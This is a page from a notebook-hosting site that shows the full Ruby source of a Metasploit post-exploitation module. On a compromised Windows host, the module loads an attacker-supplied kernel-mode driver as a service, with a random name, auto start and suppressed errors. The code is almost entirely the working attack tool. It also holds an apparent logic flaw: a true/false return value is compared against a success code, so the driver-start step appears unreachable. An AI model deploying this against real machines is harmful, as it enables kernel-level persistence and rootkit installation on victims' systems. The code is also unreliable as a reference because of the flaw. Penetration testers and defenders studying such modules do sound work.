CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Windows::Priv
9
  include Msf::Post::Windows::Services
10
  include Msf::Post::Windows::Error
11

12
  START_TYPE = {
13
    'demand' => 'SERVICE_DEMAND_START',
14
    'boot' => 'SERVICE_BOOT_START',
15
    'auto' => 'SERVICE_AUTO_START',
16
    'disabled' => 'SERVICE_DISABLED',
17
    'system' => 'SERVICE_SYSTEM_START'
18
  }
19

20
  ERROR_TYPE = {
21
    'critical' => 'SERVICE_ERROR_CRITICAL',
22
    'normal' => 'SERVICE_ERROR_NORMAL',
23
    'severe' => 'SERVICE_ERROR_SEVERE',
24
    'ignore' => 'SERVICE_ERROR_IGNORE'
25
  }
26

27
  SERVICE_TYPE = {
28
    'kernel' => 'SERVICE_KERNEL_DRIVER',
29
    'file_system' => 'SERVICE_FILE_SYSTEM_DRIVER',
30
    'adapter' => 'SERVICE_ADAPTER',
31
    'recognizer' => 'SERVICE_RECOGNIZER_DRIVER'
32
  }
33

34
  def initialize(info = {})
35
    super(
36
      update_info(
37
        info,
38
        'Name' => 'Windows Manage Driver Loader',
39
        'Description' => %q{
40
          This module loads a KMD (Kernel Mode Driver) using the Windows Service API.
41
        },
42
        'License' => MSF_LICENSE,
43
        'Author' => 'Borja Merino <bmerinofe[at]gmail.com>',
44
        'Platform' => 'win',
45
        'SessionTypes' => [ 'meterpreter' ]
46
      )
47
    )
48

49
    register_options(
50
      [
51
        OptString.new('DRIVER_PATH', [true, 'Driver path in %SYSTEMROOT%. Example: c:\\windows\\system32\\msf.sys']),
52
        OptString.new('DRIVER_NAME', [false, 'Driver Name.']),
53
        OptEnum.new('START_TYPE', [true, 'Start type.', 'auto', [ 'boot', 'system', 'auto', 'demand', 'disabled']]),
54
        OptEnum.new('SERVICE_TYPE', [true, 'Service type.', 'kernel', [ 'kernel', 'file_system', 'adapter', 'recognizer']]),
55
        OptEnum.new('ERROR_TYPE', [true, 'Error type.', 'ignore', [ 'ignore', 'normal', 'severe', 'critical']])
56
      ]
57
    )
58
  end
59

60
  def run
61
    driver = datastore['DRIVER_PATH']
62
    start = START_TYPE[datastore['START_TYPE']]
63
    error = ERROR_TYPE[datastore['ERROR_TYPE']]
64
    service = SERVICE_TYPE[datastore['SERVICE_TYPE']]
65

66
    name = datastore['DRIVER_NAME'].blank? ? Rex::Text.rand_text_alpha((rand(6..13))) : datastore['DRIVER_NAME']
67

68
    unless is_admin?
69
      print_error("Administrator or better privileges needed. Try 'getsystem' first.")
70
      return
71
    end
72

73
    unless driver =~ Regexp.new(Regexp.escape(expand_path('%SYSTEMROOT%')), Regexp::IGNORECASE)
74
      print_error('The driver must be inside %SYSTEMROOT%.')
75
      return
76
    end
77

78
    unless file_exist?(driver)
79
      print_error("Driver #{driver} does not exist.")
80
      return
81
    end
82

83
    inst = install_driver(name, path: driver, starttype: start, error_control: error, service_type: service)
84

85
    if inst == Windows::Error::SUCCESS
86
      ss = service_start(name)
87
      case ss
88
      when Windows::Error::SUCCESS
89
        print_good('Driver loaded successfully.')
90
      when Windows::Error::SERVICE_ALREADY_RUNNING
91
        print_error('Service already started.')
92
      when Windows::Error::SERVICE_DISABLED
93
        print_error('Service disabled.')
94
      else
95
        print_error('There was an error starting the service.')
96
      end
97
    end
98
  end
99

100
  def install_driver(name, opts = {})
101
    rc = service_create(name, opts)
102

103
    if rc == Windows::Error::SUCCESS
104
      print_status("Service object \"#{name}\" added to the Service Control Manager database.")
105
      return true
106
    elsif rc == Windows::Error::SERVICE_EXISTS
107
      print_error('The specified service already exists.')
108
      # Show ImagePath just to know if the service corresponds to the desired driver.
109
      service = service_info(name)
110
      print_error("Path of driver file in \"#{name}\" service: #{service[:path]}.")
111
    else
112
      print_error("There was an error opening the driver handler. GetLastError=#{rc}.")
113
    end
114
    return false
115
  end
116
end
117

118